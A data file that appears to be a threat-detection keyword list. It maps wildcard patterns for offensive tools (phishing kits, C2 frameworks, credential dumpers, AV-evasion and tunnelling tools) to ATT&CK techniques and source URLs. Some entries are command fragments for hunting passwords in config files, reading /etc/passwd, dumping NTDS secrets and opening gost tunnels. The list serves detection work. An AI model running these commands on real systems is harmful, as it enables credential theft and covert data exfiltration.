tools,https://github.com/bigb0sss/goPassGen,1,1,N/A,8,1,20,3,2020-06-04T23:13:44Z,2020-06-04T22:33:37Z -*gopherus --exploit mysql*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gophish*phish.go*,offensive_tool_keyword,gophish,Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.,T1566 - T1598,TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/gophish/gophish,1,1,N/A,N/A,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*gophish.go*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*gophish/gophish*,offensive_tool_keyword,gophish,Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.,T1566 - T1598,TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/gophish/gophish,1,1,N/A,N/A,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*gophish-send-mail.py*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*GoRelayServer.dll*,offensive_tool_keyword,DavRelayUp,DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced,T1078 - T1078.004 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/ShorSec/DavRelayUp,1,1,N/A,9,5,446,70,2023-06-05T09:17:06Z,2023-06-05T07:49:39Z -*gorsair -t *,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,0,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z -*go-secdump -*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,0,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*go-secdump.exe*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*go-secdump-main*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*gosecretsdump -ntds *-system *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gosecure/pyrdp*,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,1,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -*go-shellcode.py*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,1,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -*goShellCodeByPassVT*,offensive_tool_keyword,cobaltstrike,generate shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/fcre1938/goShellCodeByPassVT,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*goshs -b * --ssl --self-signed -p * -d /workspace*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gost -L=:* -F=*:*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gost -L=admin:*@localhost:*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gost -L=forward+ssh://:*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gost -L=rtcp://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gost -L=rudp://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gost -L=ssh://:,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gost -L=ssu://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gost -L=udp://*,offensive_tool_keyword,gost,Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.,T1568 - T1001 - T1027 - T1041,TA0002 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/ginuerzh/gost,1,0,N/A,N/A,10,13872,2298,2023-09-21T04:01:17Z,2015-03-20T09:45:08Z -*gotato -m http*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*gotato -m pipe*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*gotato* -n mal*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*gotato* -p 4644*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*Gotato-main.*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*govolution/avet*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*goZulipC2.go*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*goZulipC2-main*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*gpg --list-keys*,greyware_tool_keyword,gpg,List gpg keys for privilege escalation,T1553.002,TA0006,N/A,N/A,Discovery - Privilege Escalation,N/A,1,0,N/A,4,8,N/A,N/A,N/A,N/A -*gpg_keys/xmrig.asc*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*gpg2john.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*gpoddity.py*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*gpoddity_smbserver.py*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*GPOddity-master*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*GPO-RemoteAccess.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*gpp_autologin.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*gpp_password.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*GPP_Passwords.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*gppassword.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*gpp-decrypt *,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*gpp-decrypt.py -f groups.xml*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*gpp-decrypt.rb*,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*GPSCoordinates.exe*,offensive_tool_keyword,GPSCoordinates,Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled,T1018 - T1059.001,TA0001 - TA0002,N/A,N/A,Reconnaissance,https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*Gr1mmie/AtlasC2*,offensive_tool_keyword,AtlasC2,C# C2 Framework centered around Stage 1 operations,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/Gr1mmie/AtlasC2,1,1,N/A,10,10,193,38,2022-04-04T16:16:15Z,2021-12-27T01:40:52Z -*GrantMailboxAccess.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*GrantSamAccessPermission.vbs*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*GreatSCT*,offensive_tool_keyword,GreatSCT,GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker,T1027 - T1055 - T1566 - T1218,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*GreatSCT.git*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*GreatSCT.py*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*Greenwolf*,offensive_tool_keyword,Greenwolf,A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. so that reviewing this data is quicker for a human operator.,T2348 - T2349 - T2366 - T2423 - T2597 - T2596,TA0011 - TA0022 - TA0026,N/A,N/A,Information Gathering,https://github.com/Greenwolf/social_mapper,1,0,N/A,N/A,10,3599,797,2022-02-25T18:08:41Z,2018-07-07T14:50:07Z -*gremwell/o365enum*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,1,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*grep -* *DBPassword*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*grep *password /var/www*,greyware_tool_keyword,grep,search for passwords,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*grep *password.* /etc/*.conf*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*grep :0: /etc/passwd*,greyware_tool_keyword,grep,Look for users with a UID of 0,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*grep -i pass *,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*grep -i user *,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,https://gtfobins.github.io/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*grep -R db_passwd*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*grep -roiE *password*,greyware_tool_keyword,grep,Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords,T1059 - T1046 - T1087.002 - T1078.004,TA0002 - TA0007 - TA0004 - TA0006,N/A,N/A,Privilege escalation,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*grep*|pwd=|passwd=|password=*,greyware_tool_keyword,grep,search for passwords,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*grep*password|pwd|pass*,greyware_tool_keyword,grep,search for passwords,T1213 - T1081,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*grep-through-commits.sh *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*Group3r.cs*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*Group3r.exe*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*Group3r/Group3r*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*GruntInjection.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*gruntstager.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*GruntStager.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*gtfobins*,offensive_tool_keyword,gtfobins,GTFOBins is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems malicious use of legitimate binaries,T1059 - T1068 - T1043 - T1136,TA0002 - TA0005,N/A,N/A,POST Exploitation tools,https://gtfobins.github.io/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*GTFOBLookup*,offensive_tool_keyword,GTFOBLookup,Offline command line lookup utility for GTFOBins and LOLBAS.,T1059 - T1110 - T1216 - T1220,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/nccgroup/GTFOBLookup,1,1,N/A,N/A,3,215,40,2023-06-16T22:01:43Z,2019-09-23T16:00:18Z -*gtworek/Priv2Admin*,offensive_tool_keyword,Priv2Admin,Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.,T1543 - T1068 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/gtworek/Priv2Admin,1,1,N/A,N/A,10,1572,243,2023-02-24T13:31:23Z,2019-08-14T11:50:17Z 